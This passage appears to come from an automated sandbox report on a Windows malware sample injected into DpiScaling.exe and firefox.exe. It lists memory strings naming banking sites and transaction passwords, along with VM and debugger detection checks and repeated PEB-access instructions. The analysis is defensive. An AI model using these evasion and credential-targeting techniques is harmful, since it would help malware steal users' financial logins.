Source: DpiScaling.exe, 0000000B.00000002.2682572284.0000000007A26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ebrokers.co.inVMware20,11696494690d
Source: -631756.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000002.2677930264.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -631756.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: -631756.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: -631756.11.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: firefox.exe, 00000010.00000002.2048700903.000002893A0CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: -631756.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: DpiScaling.exe, 0000000B.00000002.2682572284.0000000007A26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,116H
Source: -631756.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: -631756.11.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: -631756.11.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: -631756.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: -631756.11.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: -631756.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: -631756.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: -631756.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: -631756.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: -631756.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: -631756.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

Code function: 7_2_01A0096E rdtsc

7_2_01A0096E

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

Code function: 7_2_004180A3 LdrLoadDll,

7_2_004180A3

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BA197 mov eax, dword ptr fs:[00000030h]	7_2_019BA197
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BA197 mov eax, dword ptr fs:[00000030h]	7_2_019BA197
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BA197 mov eax, dword ptr fs:[00000030h]	7_2_019BA197
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A00185 mov eax, dword ptr fs:[00000030h]	7_2_01A00185
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A64180 mov eax, dword ptr fs:[00000030h]	7_2_01A64180
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A64180 mov eax, dword ptr fs:[00000030h]	7_2_01A64180
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A7C188 mov eax, dword ptr fs:[00000030h]	7_2_01A7C188
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A7C188 mov eax, dword ptr fs:[00000030h]	7_2_01A7C188
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4019F mov eax, dword ptr fs:[00000030h]	7_2_01A4019F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4019F mov eax, dword ptr fs:[00000030h]	7_2_01A4019F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4019F mov eax, dword ptr fs:[00000030h]	7_2_01A4019F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4019F mov eax, dword ptr fs:[00000030h]	7_2_01A4019F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A961E5 mov eax, dword ptr fs:[00000030h]	7_2_01A961E5
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019F01F8 mov eax, dword ptr fs:[00000030h]	7_2_019F01F8
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A861C3 mov eax, dword ptr fs:[00000030h]	7_2_01A861C3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A861C3 mov eax, dword ptr fs:[00000030h]	7_2_01A861C3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]	7_2_01A3E1D0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]	7_2_01A3E1D0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3E1D0 mov ecx, dword ptr fs:[00000030h]	7_2_01A3E1D0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]	7_2_01A3E1D0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]	7_2_01A3E1D0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov eax, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov ecx, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov eax, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov eax, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov ecx, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov eax, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov eax, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov ecx, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov eax, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E10E mov ecx, dword ptr fs:[00000030h]	7_2_01A6E10E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019F0124 mov eax, dword ptr fs:[00000030h]	7_2_019F0124
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A80115 mov eax, dword ptr fs:[00000030h]	7_2_01A80115
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6A118 mov ecx, dword ptr fs:[00000030h]	7_2_01A6A118
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6A118 mov eax, dword ptr fs:[00000030h]	7_2_01A6A118
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6A118 mov eax, dword ptr fs:[00000030h]	7_2_01A6A118
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6A118 mov eax, dword ptr fs:[00000030h]	7_2_01A6A118
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6154 mov eax, dword ptr fs:[00000030h]	7_2_019C6154
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6154 mov eax, dword ptr fs:[00000030h]	7_2_019C6154
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BC156 mov eax, dword ptr fs:[00000030h]	7_2_019BC156
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A54144 mov eax, dword ptr fs:[00000030h]	7_2_01A54144
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A54144 mov eax, dword ptr fs:[00000030h]	7_2_01A54144
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A54144 mov ecx, dword ptr fs:[00000030h]	7_2_01A54144
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A54144 mov eax, dword ptr fs:[00000030h]	7_2_01A54144
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A54144 mov eax, dword ptr fs:[00000030h]	7_2_01A54144
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A58158 mov eax, dword ptr fs:[00000030h]	7_2_01A58158
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A580A8 mov eax, dword ptr fs:[00000030h]	7_2_01A580A8
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A860B8 mov eax, dword ptr fs:[00000030h]	7_2_01A860B8
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A860B8 mov ecx, dword ptr fs:[00000030h]	7_2_01A860B8
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C208A mov eax, dword ptr fs:[00000030h]	7_2_019C208A
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A460E0 mov eax, dword ptr fs:[00000030h]	7_2_01A460E0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A020F0 mov ecx, dword ptr fs:[00000030h]	7_2_01A020F0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BC0F0 mov eax, dword ptr fs:[00000030h]	7_2_019BC0F0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C80E9 mov eax, dword ptr fs:[00000030h]	7_2_019C80E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BA0E3 mov ecx, dword ptr fs:[00000030h]	7_2_019BA0E3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A420DE mov eax, dword ptr fs:[00000030h]	7_2_01A420DE
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DE016 mov eax, dword ptr fs:[00000030h]	7_2_019DE016
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DE016 mov eax, dword ptr fs:[00000030h]	7_2_019DE016
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DE016 mov eax, dword ptr fs:[00000030h]	7_2_019DE016
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DE016 mov eax, dword ptr fs:[00000030h]	7_2_019DE016
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A56030 mov eax, dword ptr fs:[00000030h]	7_2_01A56030
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A44000 mov ecx, dword ptr fs:[00000030h]	7_2_01A44000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A62000 mov eax, dword ptr fs:[00000030h]	7_2_01A62000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A62000 mov eax, dword ptr fs:[00000030h]	7_2_01A62000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A62000 mov eax, dword ptr fs:[00000030h]	7_2_01A62000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A62000 mov eax, dword ptr fs:[00000030h]	7_2_01A62000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A62000 mov eax, dword ptr fs:[00000030h]	7_2_01A62000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A62000 mov eax, dword ptr fs:[00000030h]	7_2_01A62000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A62000 mov eax, dword ptr fs:[00000030h]	7_2_01A62000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A62000 mov eax, dword ptr fs:[00000030h]	7_2_01A62000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BA020 mov eax, dword ptr fs:[00000030h]	7_2_019BA020
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BC020 mov eax, dword ptr fs:[00000030h]	7_2_019BC020
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C2050 mov eax, dword ptr fs:[00000030h]	7_2_019C2050
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EC073 mov eax, dword ptr fs:[00000030h]	7_2_019EC073
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A46050 mov eax, dword ptr fs:[00000030h]	7_2_01A46050
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019B8397 mov eax, dword ptr fs:[00000030h]	7_2_019B8397
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019B8397 mov eax, dword ptr fs:[00000030h]	7_2_019B8397
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019B8397 mov eax, dword ptr fs:[00000030h]	7_2_019B8397
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E438F mov eax, dword ptr fs:[00000030h]	7_2_019E438F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E438F mov eax, dword ptr fs:[00000030h]	7_2_019E438F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BE388 mov eax, dword ptr fs:[00000030h]	7_2_019BE388
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BE388 mov eax, dword ptr fs:[00000030h]	7_2_019BE388
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BE388 mov eax, dword ptr fs:[00000030h]	7_2_019BE388
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	7_2_019CA3C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	7_2_019CA3C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	7_2_019CA3C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	7_2_019CA3C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	7_2_019CA3C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	7_2_019CA3C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C83C0 mov eax, dword ptr fs:[00000030h]	7_2_019C83C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C83C0 mov eax, dword ptr fs:[00000030h]	7_2_019C83C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C83C0 mov eax, dword ptr fs:[00000030h]	7_2_019C83C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C83C0 mov eax, dword ptr fs:[00000030h]	7_2_019C83C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019F63FF mov eax, dword ptr fs:[00000030h]	7_2_019F63FF
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A463C0 mov eax, dword ptr fs:[00000030h]	7_2_01A463C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A7C3CD mov eax, dword ptr fs:[00000030h]	7_2_01A7C3CD
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DE3F0 mov eax, dword ptr fs:[00000030h]	7_2_019DE3F0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DE3F0 mov eax, dword ptr fs:[00000030h]	7_2_019DE3F0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DE3F0 mov eax, dword ptr fs:[00000030h]	7_2_019DE3F0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A643D4 mov eax, dword ptr fs:[00000030h]	7_2_01A643D4
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A643D4 mov eax, dword ptr fs:[00000030h]	7_2_01A643D4
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D03E9 mov eax, dword ptr fs:[00000030h]	7_2_019D03E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D03E9 mov eax, dword ptr fs:[00000030h]	7_2_019D03E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D03E9 mov eax, dword ptr fs:[00000030h]	7_2_019D03E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D03E9 mov eax, dword ptr fs:[00000030h]	7_2_019D03E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D03E9 mov eax, dword ptr fs:[00000030h]	7_2_019D03E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D03E9 mov eax, dword ptr fs:[00000030h]	7_2_019D03E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D03E9 mov eax, dword ptr fs:[00000030h]	7_2_019D03E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D03E9 mov eax, dword ptr fs:[00000030h]	7_2_019D03E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E3DB mov eax, dword ptr fs:[00000030h]	7_2_01A6E3DB
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E3DB mov eax, dword ptr fs:[00000030h]	7_2_01A6E3DB
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E3DB mov ecx, dword ptr fs:[00000030h]	7_2_01A6E3DB
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6E3DB mov eax, dword ptr fs:[00000030h]	7_2_01A6E3DB
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BC310 mov ecx, dword ptr fs:[00000030h]	7_2_019BC310
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E0310 mov ecx, dword ptr fs:[00000030h]	7_2_019E0310
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FA30B mov eax, dword ptr fs:[00000030h]	7_2_019FA30B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FA30B mov eax, dword ptr fs:[00000030h]	7_2_019FA30B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FA30B mov eax, dword ptr fs:[00000030h]	7_2_019FA30B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6437C mov eax, dword ptr fs:[00000030h]	7_2_01A6437C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A42349 mov eax, dword ptr fs:[00000030h]	7_2_01A42349
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A68350 mov ecx, dword ptr fs:[00000030h]	7_2_01A68350
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4035C mov eax, dword ptr fs:[00000030h]	7_2_01A4035C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4035C mov eax, dword ptr fs:[00000030h]	7_2_01A4035C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4035C mov eax, dword ptr fs:[00000030h]	7_2_01A4035C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4035C mov ecx, dword ptr fs:[00000030h]	7_2_01A4035C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4035C mov eax, dword ptr fs:[00000030h]	7_2_01A4035C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4035C mov eax, dword ptr fs:[00000030h]	7_2_01A4035C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8A352 mov eax, dword ptr fs:[00000030h]	7_2_01A8A352
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A562A0 mov eax, dword ptr fs:[00000030h]	7_2_01A562A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A562A0 mov ecx, dword ptr fs:[00000030h]	7_2_01A562A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A562A0 mov eax, dword ptr fs:[00000030h]	7_2_01A562A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A562A0 mov eax, dword ptr fs:[00000030h]	7_2_01A562A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A562A0 mov eax, dword ptr fs:[00000030h]	7_2_01A562A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A562A0 mov eax, dword ptr fs:[00000030h]	7_2_01A562A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FE284 mov eax, dword ptr fs:[00000030h]	7_2_019FE284
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FE284 mov eax, dword ptr fs:[00000030h]	7_2_019FE284
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A40283 mov eax, dword ptr fs:[00000030h]	7_2_01A40283
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A40283 mov eax, dword ptr fs:[00000030h]	7_2_01A40283
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A40283 mov eax, dword ptr fs:[00000030h]	7_2_01A40283
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D02A0 mov eax, dword ptr fs:[00000030h]	7_2_019D02A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D02A0 mov eax, dword ptr fs:[00000030h]	7_2_019D02A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	7_2_019CA2C3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	7_2_019CA2C3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	7_2_019CA2C3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	7_2_019CA2C3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CA2C3 mov eax, dword ptr fs:[00000030h]	7_2_019CA2C3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D02E1 mov eax, dword ptr fs:[00000030h]	7_2_019D02E1
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D02E1 mov eax, dword ptr fs:[00000030h]	7_2_019D02E1
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D02E1 mov eax, dword ptr fs:[00000030h]	7_2_019D02E1
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019B823B mov eax, dword ptr fs:[00000030h]	7_2_019B823B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6259 mov eax, dword ptr fs:[00000030h]	7_2_019C6259
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BA250 mov eax, dword ptr fs:[00000030h]	7_2_019BA250
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274 mov eax, dword ptr fs:[00000030h]	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A48243 mov eax, dword ptr fs:[00000030h]	7_2_01A48243
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A48243 mov ecx, dword ptr fs:[00000030h]	7_2_01A48243
